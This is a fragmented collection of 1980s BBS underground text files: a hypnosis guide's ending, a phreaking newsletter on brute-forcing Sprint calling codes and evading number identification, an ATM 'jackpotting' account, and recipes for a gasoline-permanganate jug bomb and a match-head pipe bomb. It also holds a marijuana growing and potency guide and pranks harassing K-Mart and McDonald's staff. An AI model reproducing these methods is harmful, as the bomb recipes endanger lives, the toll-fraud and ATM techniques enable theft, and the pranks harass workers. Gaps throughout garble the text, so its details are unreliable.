SOMETHING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FIND YOUR SELF AT HOME, IN YOUR ROOM AND YOU HAVE TO TAKE A SHO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VIDLY DESCRIBE THEIR ROOM AND WHATS HAPPENING), YOU BEGIN TO TAKE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CLOTHES..."  NOW, IT CANT BE THAT SIMPLE, YOU MUST KNOW THE PERS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USE, ROOM, AND SHOWER ROOM. THEN DESCRIBE THINGS VIVIDLY AND TELL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CT IT OUT (THEY HAVE TO BE DEEPLY UNDER TO DO THIS...).  I WOULD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GGEST THAT YOU EXPERIMENT A WHILE, AND GET TO KNOW HO; TO DO TH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AKING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ING UP IS VERY EASY, JUST SAY.. "...AS I COUNT FROM 1 TO 5 YOU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D YOURSELF BECOMMING MORE AND MORE AWAKE, MORE AND MORE LIVELY.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AKE UP YOU WILL FIND YOURSELF COMPLETELY ALIVE, AWAKE, AND REFRESH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TALLY AND PHYSICALLY, REMEMBERING THE PLEASANT SENSATION THAT HYPNOS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S...  WAKING UP FEELING LIKE A NEW BORN BABY, REBORN WITH LIF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GOR, FEELING EXCELLENT. REMEMBERING THAT NEXT TIME YOU ENTER HYPNOSIS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ECOME AN EVER INCREASING DEEPER AND DEEPER STATE THAN B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YOU FEEL ENERGY COURSE THROUGHOUT YOUR LI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YOU BEGIN TO BREATHE DEEPLY, STIR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BEGINING TO MOVE MORE AND MORE YOUR EYES OPEN, BRINGING YOU UP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 CONCI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YOU ARE UP,UP, UP AND AWAKENING MORE AND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YOU ARE AWAKE AND FEELING GRE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ATS IT!  YOU NOW KNOW HOW TO HYPNOTISE YOURSELF AND SOMEONE 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ILL LEARN MORE AND MORE AS YOU EXPERI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Remote Infor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ader supported newsletter for the under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Editors: Tracker and Norman B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eptember 1987                                               Issue: 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Headli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1) Int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2) Hacking Sprint: The Easy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3) Rumors: Why spread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4) The New Sprint FON Calling Ca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5) Automatic Number Identifier (AN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the first issue of 'The Remote Informer'!  This newsl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reader supported.  If the readers of this newsletter do not hel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port it, then it will end.  We are putting this out to help o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s that would like to read it.  If you are one of those who thinks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everything, then don't bother reading it.  This newsletter i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thing like the future issues.  The future issues will contain sev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s, as long as reader input is obtained.  Below is an out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view of the sections in the future issu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O Board (Input/Output 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O Board is for questions you have, that we might be abl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swer or atleast refer you to someone or something.  We will be honest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not help you.  We will not make up something, or to the effect,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ake it look like we answered you.  There will be a section in the I/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ard for questions we cannot answer, and then the readers will hav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portunity to answer it.  We will print anything that is reasonabl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wsletter, even complaints if you feel like you are better t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sCen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ection will be for news around the underworld.  It will talk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ts of people in the underworld and anything else that w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idered news.  If you find articles in the paper, or something happe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your local area, type it up, and upload it to one of the boards lis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end of the newsletter.  Your handle will be placed in the artic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do enter a news article, please state the date and from wher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ature S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eature Section will be the largest of the sections as it w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topic that is featured in that issue.  This will be largely rea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put which will be sent in between issues.  At the end of the issue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 it will tell the topic of the next issue, therefore, if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hing to contribute, then you will have ample time to prepare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tic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ware/Software Revi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ection, we will review the good and bad points of hard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oftware related to the underworld.  It will be an extensive revi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her than just a small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o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ection will be the area where the top underworld BBS's, hac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s, modem scanners, etc. will be shown.  This will be rea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ed and will not be altered in anyway.  The topics are listed be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world BBS's (Hack, Phreak, Card, Anarchy,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programs for Hayes compatab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programs for 1030/Xm301 mod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m scanners for Hayes compatab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m scanners for 1030/Xm301 mod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type illegal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add topics to the list if enough will support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d B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ill contain tips and helpful information sent in by the u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any information you wish to contribute, then put it in a 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and upload it to one of the BBS's listed at the end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sl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no long distance codes, mainframe passwords,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may add other sections as time goes by.  This newsletter will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put out on a regular basis.  It will be put out when we have enou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ticles and information to put in it.  There may be up to 5 a month,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ill always be at least one a month.  We would like you, the read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nd us anything you feel would be of interest to others, like hac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nts, methods of hacking long distance companies, companies to card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c.  We will maintain the newsletter as long as the readers suppor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s the end of the introduction, but take a look at this newsl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it does contain information that may be of value to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cking Sprint: The Easy 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y: Track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ck US Sprint, 950-0777 (by the way it is no longer G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t), and you are fustrated at hacking several hours only to find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two codes, then follow these tips, and it will increase your resul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emendously.  First, one thing that Mr. Mojo proved is that Sprint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store more than one code in every hundred numbers.  (ex: 98765400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8765499 may contain only one code).   There may NOT be a code in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ndred, but there will never be more than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t's 9 digit codes are stored from 500000000 through 9999999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beginning of Sprint's 950 port, they only had 8 digit codes.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started converting to 9 digit codes, storing all 8 digit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10000000 and 49999999 and all 9 digit codes between 500000000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9999999.  Sprint has since cancelled most 8 digit codes, although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a few left that have been denoted as test codes.  Occaisionally,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r of phreaks saying they have 8 digit codes, but when verifying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des were inva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where do you start?  You have already narrowed the low and hi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in half, therefore already increasing your chances of good resul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50 percent.  The next step is to find a good prefix to hack.  B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a prefix, in hacking terms, is the first digits in a code that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length except the same number of digits the code is.  (ex: 12345678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a code.  That means 1, 12, 123, 1234, 12345, 123456, 1234567,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345678 are prefixes)  The way you find a good prefix to hack i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ually enter a code prefix.  If when you enter the code prefix an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lid destination number and you do not hear the ringing of the reco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ing you that the code is invalid until near the end of th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you know the prefix is valid.  Here is a chart to follow when do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      - Destination    Range good codes ex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3456789 - 6192R           123400000 - 1234999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3456789 - 619267R         123450000 - 1234599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3456789 - 61926702R       123456000 - 1234569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3456789 - 6192670293R     123456700 - 1234567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 - Denotes when ring for recording sta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pr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rue, I ran a test using OmniHack 1.3p, written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lly Joe.  In this test I found a prefix where the last 3 digits were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hack.  I tested each hundred of the 6 digit prefix finding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but 4 had the ring start after the fourth digit was dialed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ination number.  The other four did not ring until I had finishe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ire code.  I set OmniHack to hack the prefix + 00 until prefix +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 xxxxxxy00 to xxxxxxy99: where y is one of the four numbers t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g did not start until the dialing was completed.)  Using this method,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nd four codes in a total of 241 attempts using ascending hacking (AK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quential).  Below you will see a record of my h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nge of hack            Codes found     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xxxxx300 - xxxxxx399     xxxxxx350        5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xxxxx500 - xxxxxx599     xxxxxx568        6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xxxxx600 - xxxxxx699     xxxxxx646        4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xxxxx800 - xxxxxx899     xxxxxx877        7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tals                     4 codes        24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you see, these methods work.  Follow these guidlines and tip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uld have an increase in production of codes in the future hac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t.  Also, if you have any hints/tips you think others could benef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en type them up and upload them to one of the boards at the end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wsl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umors: Why Spread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y: Trac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you ever get tired of hearing rumors?  You know, someone gets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rge to impress others, so they create a rumor that some long di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is now using tracing equipment.  Why start rumors?  It only sca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s out of phreaking, and then makes you, the person who starte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mor, look like Mr. Big.  This article is short, but it should mak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are of the rumors that people spread for personal gain.  The best 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o is to denote them as a rumor starter and then leave it at that.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not rag on them constantly, since if the other users can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rmine if it is fact or rumor, then they should suff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equ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New Sprint FON Calling Ca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y: Trac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 Sprint has opened up a new long distance network called the Fi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tic Network (FON), in which subscribers are given calling cards.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ing cards are 14 digits, and though, seem randomly generated,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ually encrypted.  The rumors floating around about people get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ght using the Sprint FON calling cards are fact, not rumor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son people are getting caught is that they confuse the FON cal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s with the local 950 port authorization codes.  If you will reme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use AT&amp;T calling cards from you home phone.  It has AN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bility, which is not tracing, but rather the originating phon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placed on the bill as soon as the call is completed.  They know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number when you call the 800 access port, but they do not recor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your call is completed.  Also, through several of my hacks, I c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with some interesting information surrounding the new Sprint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are listed be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877-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number is for information on US Sprint's 800 calling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I have not played around with it, but I believe it i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ouble or help with the FON calling cards.  I am not sure if it i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cribing to the FON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877-0002 - You hear a short tone, then no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877-0003 - US Sprint Alpha Test Channel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877-(0004-09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call these numbers, you get a recording saying: "Welcom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 Sprint's 1 plus service."  When the recording stops, if you hi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und key (#) you will get the calling card dial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related Sprint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21-4949   This is the number that you subscribe to US Sprint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also subscribe to the FON network on this number.  It will take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5 weeks for your calling card to arr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77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US Sprint's equal access number.  When you dial this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hen dial the number you are calling, and it will be billed through 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t, and you will receive their long distance line for that call.  N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you will be billed for calls made through equal access.  Do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stake it to be a method of phreaking, unless used from a rem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are in US Sprint's 1+ service then call 1+700-555-1414,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ell you which long distance company you are using.  When you h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k you for choosing US Sprint's 1 plus service," hit the pound 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nd then you will get the US Sprint dial tone.  This however is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ame as if you are calling from your home phone if you dial direct,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ould be billed for calls made through that, but there are ways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o your advantage as in using equal access through a PB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utomatic Number Identification (AN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y: Track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rue definition for Automatic Number Identification has not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ly known to many.  Automatic Number Identification, (AKA: ANI),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ss of the destination number knowing the originating number, which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you are calling from.  The method of achieving this is to se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number that you are calling from in coded form ahead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ination number. Below is an example of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I Meth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267-029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t: ********267029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Denotes the originating number which is coded and sent befor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you noticed there are 8 digits in the coded number.  Thi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at least I believe, it is stored in a binary-like fo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matic Number Identification means a limited future in phreaking. AN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es not threaten phreaking very much yet, but it will in the near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new switching system will soon be installed in most cities that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vered by ESS, Electronic Switching System,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ystem will have ANI capabilities which will be supplied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ners of phone lines as an¢added extra.  The owner's phone will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LED read-out that will show the phone number of the peopl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you.  You will be able to block some numbers, so that peo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not call you.  This system is in the testing stages currently, but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n be installed across most of the country.  As you see, this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 a large part of phreaking, until we, the phreakers, can come up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alternative.  As I have been told by several, usually reli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this system is called ISS, which I am not sure of the meaning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and is being tested currently in Rhode Is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 in-watts lines set up by AT&amp;T support ANI.  The equipmen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ode an ANI coded origination number does not costs as much as you w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ect.  950 ports do not offer ANI capability, no matter what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n told.  The 950 ports will only give the city in which they are ba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usually being the largest in the state, sometimes the capit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last thing that I should tell you is that ANI is not relat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ing.  Tracing can be done on any number whether local, 950, etc.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around this, especially when dialing Alliance TeleConferencing, i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through several extenders or ports.  ANI will only cover th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s calling it, and if you call through a number that does not supp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I, then your number will never be kn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Disclai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he editors, take no responsibility for your actions and us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formation in this newsletter.  This newsletter is for informa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rposes only.  There will never be any long distance codes, passwo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c. in this newsletter.  If you are easily offended by telecommun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ussions, then we suggest that you not read this newsletter.  But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se who are truely interested in the information in this newsl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joy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ought to you in Cookbook,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ckpotting ATM Machines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CKPOTTING was done rather successfully a while back in (you guesse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York. What the culprits did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r (actually cross over) the line between the ATM a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st. insert a microcomputer between the ATM and the host. inse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radulent card into the ATM.  (card=cash card, not hard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the ATM did was: send a signal to the host, saying "Hey!  Can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this guy money, or is he broke, or is his card inva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the microcomputer did was: intercept the signal from the h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ard it, send "there's no one using the ATM" sig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the host did was: get the "no one using" signal, send back "ok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for God's sake don't spit out any money!" signal to AT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the microcomputer did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cept signal (again), throw it away (again), send "Wow!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uy is like TOO rich!  Give him as much money as he want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ct, he's so loaded, give him ALL the cash we have!  H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lly a valued customer." sig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the ATM d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else?  Obediently dispense cash till the cows came home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y nearly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the crooks g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in excess of $120,000 (for one weekend's work), and sev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rs when they were cau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tory was used at a CRYPTOGRAPHY conference I attended a wh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o to demonstrate the need for better information securit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s between ATM's &amp; their hosts are usually 'weak' in the sens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formation transmitted on them is generally not encrypted in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One of the ways that JACKPOTTING can be defeated is to encry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formation passing between the ATM and the host.  As long a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cannot be determined from the ciphertext, the transmissio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nce the transaction) is sec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ore believable, technically accurate story might concern a per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 uses a computer between the ATM and the host to determine the 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actually fooling the host.  As everyone knows, people f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yptanalysis a very exciting and engrossing subject...don't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e-He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             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lt;&lt;-|   |-&lt;&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M|    micro    |H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gt;&gt;-|   |-&gt;&gt;-|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 of A ATM's are connected through dedicated lines to a h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as the Bishop said. However, for maintenance purposes,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at least one separate dial-up line also going to that same h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This guy basically bs'ed his way over the phone till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nd someone stupid enough to give him th number. After finding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had has Apple hack at the code. Sim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2: He had a friend go to an ATM with any B of A ATM card.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yed at home with the Apple connected to the host. When his fri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erted the card, the host displayed it. The guy with the Ap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ified the status &amp; number of the card directly in the ho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mory. He turned the card into a security card, used for te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rposes. At that point, the ATM did whatever it's operator told i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xt day, he went into the bank with the $2000 he recei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ed to the manager and told him every detail of what he'd don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ager gave him his business card and told him that he had a jo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him when he got out of sch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B of A has been warned, they might have changed the system.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ther hand, it'd be awful expensive to do that over the wh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try when only a handful of people have the resources and even l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the intelligence to duplicate the feat. Who kn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g Bomb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glass jug, and put 3 to 4 drops of gasoline into it. Then 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p on, and swish the gas around so the inner surface of the ju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coated.  Then add a few drops of potassium permanganate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it and cap it.  To blow it up, either throw it at something,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ll it at some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 at K-Mart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first off, one must realise the importance of K-Mart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ciety today. First off, K-Marts provide things cheaper to those wh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afford to shop at higher quality stores.  Although, all I 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in there is minorities and Senior Citizens, and the poor peopl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city.  Personally, I wouldn't be caught dead in there.  But, o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ee, once, after The Moon Roach and Havoc Chaos(Dear friend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e) and I were exploring such fun things as rooftops, we came a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K-Mart.  Amused, and cold for that matter, we wandered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nsion mou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walked up to the entrance, we were nearly attacked by You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ps selling cheap cookies, and wheelchair sticken people sel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erican Flags.  After laughing at these people, we entered. Thi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he real fun be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we wandered around the store, and turned on all the b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s we could find. That really distracts and confus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endents...Fun to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rst neat thing, is to go to the section of the store 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sell computers. Darkness engulf the earth the day they find Ap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s being sold there.  Instead, lesser computers lik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ughable C-64 can be found there...Turn it on, and make s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s looking...Then, once in Basic,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 PRINT "Fuck the world!  Anarchy Rules!" (or something to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 GOTO 10 and walk a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set the sample radios in the store to a santanic rock st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urn the radio off.  Then, set the alarm for two minutes ahead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ime displayed there.  Turn the volume up all the way, and wa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ay.  After about two minutes, you will see the clerk feebly atte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urn the radio down or off.  It's really neat to set ten or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ios to different stations, and walk a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my favorite things to do, is to get onto the intercom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store.  Easier typed then done.  First, check out the gard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artment.  You say there's no attendent there? Good.  Sn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efully over to the phone behind the cheap counter there, and p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up.  Dial the number corrisponding to the item that says 'P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alk.  You will note that your voice will echo all over the bowe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K-M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suggest announcing something on the lines of: "Anarch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e Substitut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PARTS: Alcoh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 PARTS: Iod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 PARTS: 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PARTS: Alcoh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PARTS: Iodized Salt (Mort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not actual mace, but it does a damn good job on the ey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grow Marijuana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IJUAN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juana is a deciduous plant which grows from seeds. The fibrous s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plant was (has been replaced by synthetics) used to make ro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lowering tops, leaves, seeds, and resin of the plan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by just about everyone to get HI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mally, the vegetable parts of the plant are smoked to produce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 but thay can also be eaten. The axtive ingredient in marijuan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n is THC (tetahydrocannabinol). Marijuana contains from 1 - 4 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 THC (4 per cent must be considered GOOD do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juana grows wild in many parts of the world, and is cultivat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xice, Vietnam, Africa, Nepal, India, South America, etc.,etc.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juana sold in the United States comes primarily from, y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ited St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estimated that at least 50 per cent of the grass on the stre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merica is homegrown. The next largest bunch comes actos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rders from Mexico, with smaller amounts filtering in from Panam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ccasionally South America, and occasinally, Afr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shish is the pure resin of the marijuana plant, which is scraped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lowering tops of the plant and lumped together. Ganja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up tops of the finest plants. (It is also the name given to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rt of marijuana in Jama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juana will deteriorate in about two years if exposed to l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 or heat. It should always be stored in cool pla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ss prices in the United States are a direct reflection of the la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supply and demand (and you thought that high school economi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never be useful). A series of large border busts, a short gr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son, a bad crop, any number of things can drive the price of marijuan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Demand still seems to be on the increase in the U.S., so prices seld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 below last year's lev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ch year a small seasonal drought occurs, as last year's supply ru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 and next year's crop is not up yet. Prices usually rase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 - 75 per cent during this time and then fall back to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questionably, a large shortage of grass causes a percentage of smok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urn to harder drugs instead. For this reason, no grass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can ever be beneficial or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ROW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one surefire way of avoiding high prices and the grass D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w your own. This is not as difficult as some "authorities"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ject would make you believe. Marijuana is a weed, and a fair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vacious one at that, and it will grow almost in spite o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UTDO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ary to propular belief, grass grows well in many place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th American continent. It will flourish even if the temperature d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raise above 75 degre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lants do need a minimum of eight hours of sunlight per day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be planted in late April/early May, BUT DEFINITELY, aft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frost of the y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wing an outdoor, or "au naturel", crop has been the favored meth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the years, because grass seems to grow better without as m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ention when in its natural habit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course, an outdoors setting requires special precautions not enco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ed with an indoors crop; you must be able to avoid detection, both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w enforcement freaks and common freaks, both of whom will take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ed and probably use it. Of course, one will also arrest you. You m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have access to the area to prepare the soil and harvest the cr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two schools of thought about starting the seeds. One say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start the seedlings for about ten days in an indoor starter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the indoor section) and then transplant. The other theory i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uld just start them in the correct location. Fewer plants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up with this method, but there is no shock of transplan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ll some of the seedlings halfway throu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il should be preprepared for the little devils by turning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a couple of times and adding about one cup of hydrated lime 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quare yard of soil and a little bit (not too much, now) of good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uble nitrogen fertilizer. The soil should now be watered sev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s and left to sit about one wee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lants should be planted at least three feet apart, getting to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dy and stacking them too close will result in stunted pla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lants like some water during their growing season, BUT not to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ch. This is especially true around the roots, as too much water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t the root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ss grows well in corn or hops, and these plants will help prov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camouflage. It does not grow well with rye, spinach, or pepperw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probally a good idea to plant in many small, broken patches,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tend to notice patter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NERAL GROWING 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th the male and he female plant produce THC resin, although the ma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not as strong as the female. In a good crop, the male will st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nty smokable and should not be thrown away under any circumsta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juana can reach a hight of twenty feet (or would you rather wish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ar) and obtain a diameter of 4 1/2 inches. If normal, it has a s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io of about 1:1, but this can be altered in several w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ale plant dies in the 12th week of growing, the female will l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3 - 5 weeks to produce her younguns. Females can weigh twice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ch as males when they are m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juana soil should compact when you squeeze it, but should also br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art with a small pressure and absorb water well. A nice t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ither indoor or outdoor growing is to add a bunch of worms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if they live and hang aroung, it is good soil, but if they do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change it. Worms also help keep the soil loose enough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ts to grow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good grass, you should start with the right seeds. A nice star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nt is to save the seeds form the best batch you have consume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ds should be virile, that is, they should not be grey and shirive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but green, meaty, and healthy appearing. A nice test is to drop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ds on a hot frying pan. If they "CRACK," they are probably goo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ting purpo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eds should be soaked in distilled water overnight before plan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SURE to plant in the ground with the pointy end UP. Plant about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ep. Healthy seeds will sprout in about five d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PROU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est all around sprouting method is probably to make a sprouting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sold in nurseries) with a slated bottom or use paper cups with ho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nched in the bottoms. The sprouting soil should be a mixture of hum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and five sand with a bit of organic fertilizer and water mix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bout one week before plan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ready to transplant, you must be sure and leave a ball of s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the roots of each plant. This whole ball is dropped in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eball-sized hold in the permanent s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are growing/transplanting indoors, you should use a g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fe light (purchased at nurseries) during the transplanting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are transplanting outdoors, you should time it about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urs befor sunset to avoid damage to the plant. Always wear cott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oves when handling the young pla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the plants are set in the hole, you should water them. It is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good idea to use a commercial transplant chemical (also purchased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rseries) to help then overcome the sh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DOOR GR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oor growing has many advantages, besides the apparent fact tha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much harder to have your crop "found," you can control the ambi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itions just exactly as you want them and get a guaranteed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ts grown indoors will not appear the same as their outdoor cous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ill be scrawnier appearing with a weak stems and may even requ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o tie them to a growing post to remain upright, BUT THEY WILL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MUCH OR MORE RES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growing in a room, you should put tar paper on the floors and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y sterilized bags of soil form a nursery. You will need about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bic foot of soil for eavh pl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lants will need about 150 ml. of water per plant/per week.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also need fresh air, so the room must be ventilated. (how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resh air should contain NO TOBACCO sm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least eight hours of light a day must be provided. As you incre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ght, the plants grow faster and show more females/less ma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xteen hours of light per day seems to be the best combination, bey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akes little or no appreciable difference in the plant qua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idea is to interrupt the night cycle with about one hour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 This gives you more fema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lls of your growing room should be painted white or covered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foil to reflect the l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ghts themselves can be either bulbs of fluorescent. Figure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5 watts per plant or one plant per two feet of flouresent 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luorescents are the best, but do not use "cool white" typ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 sources should be an average of twenty inches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t and NEVER closer than 14 inches. They may be mounted on a r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d every few days as the plants gr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ery best light sources are those made by Sylvania and oth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pecially for growing plants (such as the "gro lux" typ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RVESTING AND DRY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ale plants will be taller and have about five green or yellow sep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will split open to fertilize the female plant with poll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emale plant is shorter and has a small pistillate flower,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lly doesn't look like a flower at all but rather a small bunch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aves in a clu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don't want any seeds, just good dope, you should pick the ma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they shed their pollen as the female will use some of her res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ake the s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another three to five weeks, after the males are gone, the fema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egin to wither and die (from loneliness?), this is the time to p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some nefarious Middle Eastren countries, farmers reportedly put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hives next to fiels of marijuana. The little devils collect the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len for their honey, which is supposed to contain a fair do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ney is then enjoyed by conventional methods or made into ambros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seeds - let the males shed his pollen then pick him. L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emale go another month and pick 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ure the plants, they must be dried. On large crops, thi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mplished by constructing a drying box or drying ro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ust have a heat source (such as an electric heater) which will m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ox/room each 130 degrees. The box/room must be ventil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arry off the water-vapor-laden air and replace it with fre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good box can be constructed from an orange crate with fibergl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ulated walls, vents in the tops, and screen shelves to hold the lea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must be a baffle between the leaves and the heat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quick cure for smaller amounts is to: cut the plant at the soil lev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rap it in a cloth so as not to loose any leavs. Take out any s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hand and store. Place all the leaves on a cookie sheet or aluminu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il and put them in the middle sheld of the oven, which is set on "br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few seconds, the leaves will smoke and curl up, stir them aroun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another ten seconds before you take them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INCREASE THE GOOD STU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everal tricks to increase the number of females, or the TH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ent of pla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make the plants mature in 36 days if you are in a hurry, by cut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 on the light to about 14 hours, but the plants will not be as bi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uld gradually shorten the light cycle until you reach fourt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u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top any watering as the plants begin to bake the resin ris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lowers. This will increse the resin a b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use a sunlamp on the plants as they begin to develop flower stal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nip off the flower, right at the spot where it joins the pl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 new flower will form in a couple of wee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an be repeated two or three times to get several times more flow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 usu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plants are sprayed with Ethrel early in their growing stage,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produce almost all female plants. This usually speeds up the flowe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it may happen in as little as two wee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employ a growth changer called colchicine. This is a bit har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and expensive. (Should be ordered through a lab of some sor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sts about $35 a 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use the colchicine, you should prepare your presoaking solution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tilled water with about 0.10 per cent colchicine. This will ca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y of the seeds to die and not germinate, but the ones that do c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will be polyploid plants. This is the accepted difference betw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h strains as "gold" and normal grass, and yours will DEFINI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superw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roblem here is that colchicine is a posion in larger quanitie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be poisonous in the first generation of plants. Bill Frake, aut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CONNOISSEUR'S HANDBOOK OF MARIJUANA runs a very complete colchic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eatment down and warns against smoking the first generation pla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succeeding generations will also be polyploid) bacause of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sonous qua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 the Medical Index shows colchicine being given in very sm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ntities to people for treatment if various ailments. Although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ntities are small, they would appear to be larger than any you c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ive form smoaking a seed-treated pl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ould be a good idea to buy a copy of CONNOISSEUR'S, if you are plan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ttempt this, and read Mr. Drake's complete instru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still-experimental process to increase the resin it to pinch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eaf tips as soon as they appear from the time the plant is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dling stage on through its entire life-span. This produces a distor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ecked-looking plant which would be very difficuly to recognize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juana. Of course, there is less substance to this plant, but s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ecked creatures have been known to produve so much resin tha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ystallizes a strong hash all over the surface of the plant - m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wise to try it on a plant or two and see what happe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LANT PROBLEM CH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ways check the overall enviromental conditions prior to pas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dgment - soil aroung 7 pH or slightly less - plenty of water, l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sh air, loose soil, no water standing in poo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YMPTOM                       PROBABLY PROBLEM/C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rger leaves turning yellow -      Nitrogen dificiency - ad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er leaves still green.         nitrate of soda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ganic fertiliz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lder leaves will curl at edges,    Phosphorsus dificienc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dark, possibaly with a purple  add commercial phosph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ure leaves develop a yellowish   Magnesium dificienc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t to least veinal areas.         add commercial fertiliz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a magnesium cont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ure leaves turn yellow and then  Potassium dificienc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ome spotted with edge areas      add muriate of pota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ing dark gr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cked stems, no healthy support   Boron dificiency - ad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ssue.                             any plant food contai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 wrinkled leaves with          Zinc dificiency - ad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lloish vein systems.              commercial plant f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taining zi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ng leaves become deformed,       Molybedum dificienc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sibaly yellowing.                use any plant food wit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it of molydbenum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TRA S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D WEED/GOOD W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you turn bad weed into good weed? Surprisingly enough, the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is oft-asked inquiry is,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most other things in life, the amount of good you are go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o relates directly to how much effort you are going to put into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no instant, supermarket products which you can spray on Kans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tnip and have wonderweed, but there are a number of simplif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expensive processes (Gee, Mr. Wizard!) thich will enhance medioc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ss somewhat, ant there are a couple of fairly involved proce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will do up even almost-parsley weed into something worth wri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e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Place the dope in a container which allows air to enter in a restric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shion (such as a can with nail holes punched in its lid) and ad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nch of dry ice, and the place the whold shebang in the freezer for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w days. This process will add a certain amount of potency to the produ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 this only works with dry ice, if you use normal, every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ezer ice, you will end up with a soggy m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Take a quantity of grass and dampen it, place in a baggie or an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cially acceptable container, and store it in a dark, dampish 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couple of weeks (burying it also seems to work). The grass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velop a mold which tastes a bit harsh, a and burns a tiny bit fun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does increase the pot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Expose the grass to the high intensity light of a sunlamp for a fu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y or so. Personally, I don't feel that this is worth the effort,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just spent $400 of your friend's money for this brick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er-Colombian, right-from-the-President's-personal-sta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turns out to be Missouri weed, and you're packing your bag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town before the people arrive for their shares, well, you m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least try it. Can't hu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Take the undisirable portions of our stash (stems, seeds, weak w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ms, etc.) and place them in a covered pot, with enough rubb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chol to cover ever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CAREFULLY boil the mixture on an ELECTRIC stove or lab burner.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USE GAS - the alchol is too flammable. After 45 minutes of he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ve the pot and strain the solids out, SAVING THE ALCOH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repeat the process with the same residuals, but fresh alch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second boil is over, remove the solids again, combine the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ntities of alcohol and reboil until you have a syrupy mix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his syrupy mixture will contain much of the THC formerly hidd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stems and such. One simply takes this syrup the through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bines it with the grass that one wishes to improve up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PECIAL SECTION ON RELATED SUBJECT MARY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ygin is an anagram of the words marijuana and gin, as in Eli Whitn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a plastic tumbler which acts much like a commercial cottin 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takes about one ounce of an harb and breaks it up. This is then plac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rygin and the protuding knod is roatated. This action tur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ternal wheel, which separates the grass from the debris (s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does not pulberize the grass as screens have a habit of doing and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ily wash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ygin is available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 Box 582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uscon, Arizona 8570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Edmund Scientific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55 Edscorp Buil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rington, New Jersy 08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ee Catalog is a wonder of good things for the potential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wer. They have an electric thermostat greenhouse for star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ts for a mere $14.9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test kits for PH - $2.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 test - $9.9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thermometer - $2.7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s which approzimate the true color balance of the sun and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bably the most beneficial types available: 40 watt, 48 inch - 4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5.7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oor sun bulb, 75 or 150 watt - $5.7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y have a natural growth regualtor for plants (Gibberellin)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change height, speed growth, and maturity, promote blossom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c. Each plant reacts differently to treatment with Gibberellin...the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fun like experimenting - $2.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GGESTED REA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NOISSEUR'S HANDBOOK OF MARIJUANA, Bill Dr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aight Arrow Publishing - $3.5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25 Third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n Francisco, Californi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Box 1609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n Fransicso, California 941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cks a series of pamphlets on grass, dope manufacture, coo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udes the Mary Jane Superweed se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ch Head Bomb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e safety match heads in a pipe, capped at both ends, mak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vestating bomb. It is set off with a regular f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plastic Baggie is put into the pipe before the heads go in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ent detonation by contact with the met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tting enough match heads to fill the pipe can be tedious work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but an evening's fun for the family if you can drag them awa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Terrorize McDonald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iginally an Apple ][ file so excuse the upper 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ALTHOUGH Mc DONALDS IS FAMOUS FOR IT'S ADVERTISING AND MAK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LE WORLD THINK THAT THE BIG MAC IS THE BEST THING TO COME ALONG SI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ICED BREAD (BUNS?), EACH LITTLE RESTAURANT IS AS AMATEUR AND SIMPLE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NEW-FOUND BUSNESS. NOT ONLY ARE ALL THE EMPLOYEES RATHER INEXPERIENC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WHAT THEY'RE =SUPPOSED= TO DO, BUT THEY WILL JUST LOOSE ALL CONTROL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EMERGENCY OCCURS....HERE WE GO!!! FIRST, GET A FEW FRIENDS (4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OD...I'LL GET TO THIS LATER) AND ENTER THE MCDONALDS RESTAURANT, TAL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UDLY AND REAKING OF SOME STRANGE SMELL THAT AUTOMATICALLY MAKES THE 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PLE SITTING BY THE DOOR LEAVE. IF ONE OF THOSE PIMPLY-FACED GOON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PING THE FLOOR, THEN TRACK SOME CRAP ALL OVER IT (YOU COULD PRETEN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IP AND BREAK YOUR HEAD, BUT YOU MIGHT ACTUALLY DO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 BEFORE YOU GET THE FOOD, FIND A TABLE. START YELLING AND RELEA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STRANGE BODY ODOR SO =ANYBODY= WOULD LEAVE THEIR TABLE AND WALK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OOR. SIT 2 FRIENDS THERE, AND GO UP TO THE COUNTER WITH AN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D A PLACE WHERE THE LINE IS SHORT, OR IF THE LINE IS LONG SAY "I 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BUY A COKE" AND YOU GET MOVED UP. NOW, YOU GET TO DO THE =ORDE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H HEH HEH. SOMEBODY =ALWAYS= MUST WANT A PL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MBURGER WITH ABSOLUTELY NOTHING ON IT (THIS TAKES EXTRA TIME TO MAK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VES THE LITTLE HAMBURGER-MAKERS INSANE)..ORDER A 9-PACK OF CHICK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CNUGGETS...NO, A 20 PACK...NO, THREE 6 PACKS...WAIT...GO BACK TO THE T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SK WHO WANTS WHAT. YOUR OTHER FRIEND WAITS BY THE COUNTER AND MAKE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 AT THE FEMALE CLERK. GET BACK TO THE THING AND ORDER THREE 6-PACK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ICKEN ETC....NOW SHE SAYS "WHAT KIND OF SAUCE WOULD YOU LIKE?".OF COUR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THAT YOU ALL WANT BARBECUE SAUCE ONE OF YOUR FRIENDS WANTS 2 (ONLY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ONLY 2 CONTAINERS OF BARBECUE SAUCE LEFT).THEN THEY HAFTA GO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OREROOM AND OPEN UP ANOTHER BOX. FINALLY, THE DRINKS...SOMEBODY WA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KE, SOMEBODY ROOT BEER, AND SOMEBODY DIET COKE. AFTER THESE ARE DELIVE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THEM BACK AND SAY "I DIDN'T ORDER A DIET COKE! I ORDERED A SPR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GETS THEM MAD; BETTER YET, TURN DOWN SOMETHING TERRIBLE THAT NOBO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TS TO DRINK, SO THEY HAFTA THROW THE DRINK AWAY; THEY CAN'T SELL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ALL THE FOOD(?) IS HANDED TO YOU, YOU MUST =NEVER= HAVE ENOUGH MON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PAY. THE CLERK WILL BE SO ANGRY AND CONFUSED THAT SHE'LL LET YA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AY WITH IT (ANOTHER INFLUENCE ON HER IS YOUR FRIEND ASKING HER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US GO I'LL GO OUT WITH YOU" AND GIVING HER A FAKE FON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BACK TO YOUR TABLE. BUT FIRST, SOMEBODY LIKES KETCHUP AND MUST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LENTY (TOO MUCH) OF NAPKINS. OH, AND SOMEBODY LIKES FORKS AND KNI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ALWAYS END UP BREAKING THE ONES YOU PICK OUTTA THE BOX. HAVE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IENDS YELL OUT,"YAY!!!!! WE HAVE MUNCHIES!!" AS LOUD AS THEY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LL WORRY THE ENTIRE RESTAURANT. PROCEED TO SIT DOWN. SO, YOU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TING IN THE SMOKING SECTION (BY ACCIDENT) EH? WELL, WHILE ON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BACCO-BREATHERS ISN'T LOOKING, PUT A SIGN FROM THE OTHER SID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SAYING "DO NOT SMOKE HERE" AND HE'LL HAFTA MOVE...THEN HE GOES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AL NON-SMOKING SECTION, AND GETS YELLED AT. HE THEN THINK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MOKING IS ALLOWED IN THE RESTAURANT, SO HE EATS OUTSIDE (IN THE P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G RAIN) AFTER YOUR MEAL IS FINISHED (AND QUITE A FEW SPLATTERED-OPE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TCHUP PACKETS ARE ALL OVER YER TABLE), TRY TO LEAVE. BUT OOPS! SOMEBO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S TO DO HIS DUTY IN THE MEN'S 